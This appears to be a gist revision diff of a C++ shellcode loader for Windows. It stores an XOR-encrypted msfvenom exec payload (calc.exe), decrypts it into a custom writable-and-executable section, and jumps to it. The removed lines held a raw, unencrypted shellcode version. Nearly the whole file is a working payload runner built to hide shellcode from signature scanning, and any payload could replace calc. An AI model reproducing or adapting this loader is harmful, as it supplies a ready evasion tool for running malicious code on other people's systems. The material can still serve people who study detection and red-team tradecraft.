|
|
@@ -1,31 +1,38 @@ |
|
|
// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe |
|
|
#include <cstdint> |
|
|
|
|
|
unsigned char buf[] = |
|
|
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" |
|
|
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" |
|
|
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" |
|
|
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" |
|
|
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" |
|
|
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" |
|
|
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" |
|
|
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" |
|
|
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" |
|
|
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" |
|
|
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" |
|
|
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" |
|
|
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" |
|
|
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" |
|
|
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" |
|
|
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" |
|
|
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd" |
|
|
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0" |
|
|
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff" |
|
|
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; |
|
|
// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./byorwx.S -o ./byorwx.exe |
|
|
|
|
|
extern unsigned char PAYLOAD[]; |
|
|
|
|
|
// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef |
|
|
unsigned char buf[] = |
|
|
"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32" |
|
|
"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36" |
|
|
"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c" |
|
|
"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23" |
|
|
"\xa2\xad\x68\x27\x60\xa3\x81\x89\x37\x27\x30\x2a\xe8\x36" |
|
|
"\x45\xed\x23\x5e\x2b\x65\xb5\xed\xe1\xea\x63\x64\x65\x2e" |
|
|
"\xe4\xa2\x17\x03\x2d\x67\xb1\x32\xe8\x2c\x7d\x22\xea\x22" |
|
|
"\x43\x2d\x64\xb6\x82\x34\x2b\x9b\xac\x27\xea\x56\xeb\x2c" |
|
|
"\x64\xb0\x2c\x53\xaa\x2c\x54\xa6\xcd\x23\xa2\xad\x68\x27" |
|
|
"\x60\xa3\x5b\x84\x10\x97\x2d\x61\x2f\x40\x6d\x23\x58\xb3" |
|
|
"\x16\xbc\x3d\x22\xea\x22\x47\x2d\x64\xb6\x07\x23\xe8\x68" |
|
|
"\x2d\x22\xea\x22\x7f\x2d\x64\xb6\x20\xe9\x67\xec\x2d\x67" |
|
|
"\xb1\x23\x3b\x25\x3d\x38\x38\x38\x22\x3c\x24\x3f\x20\x38" |
|
|
"\x2b\xe7\x89\x46\x20\x30\x9c\x84\x3d\x27\x38\x38\x2b\xef" |
|
|
"\x77\x8f\x36\x9d\x9c\x9b\x38\x2e\xdb\x63\x63\x64\x65\x66" |
|
|
"\x61\x62\x63\x2c\xe8\xeb\x60\x63\x63\x64\x24\xdc\x50\xe9" |
|
|
"\x0c\xe3\x9a\xb3\xda\x92\xd6\xc6\x33\x27\xdb\xc4\xf6\xd9" |
|
|
"\xf8\x99\xb4\x2a\xe0\xa0\x4d\x5a\x67\x1e\x69\xe4\x9e\x86" |
|
|
"\x14\x67\xd8\x23\x76\x14\x0e\x08\x63\x3d\x24\xef\xbb\x9d" |
|
|
"\xb6\x07\x04\x0a\x02\x4c\x06\x1c\x00\x66"; |
|
|
unsigned char key[] = {'a','b','c','d','e','f'}; |
|
|
|
|
|
int main() { |
|
|
__builtin_memcpy(PAYLOAD, buf, sizeof(buf)); |
|
|
for (size_t i = 0; i < sizeof(buf); ++i) { |
|
|
PAYLOAD[i] = PAYLOAD[i] ^ key[i % sizeof(key)]; |
|
|
} |
|
|
const auto exec_buf = reinterpret_cast<void (*)()>(PAYLOAD); |
|
|
exec_buf(); |
|
|
return 0; |
|
|
|
dadevel revised this gist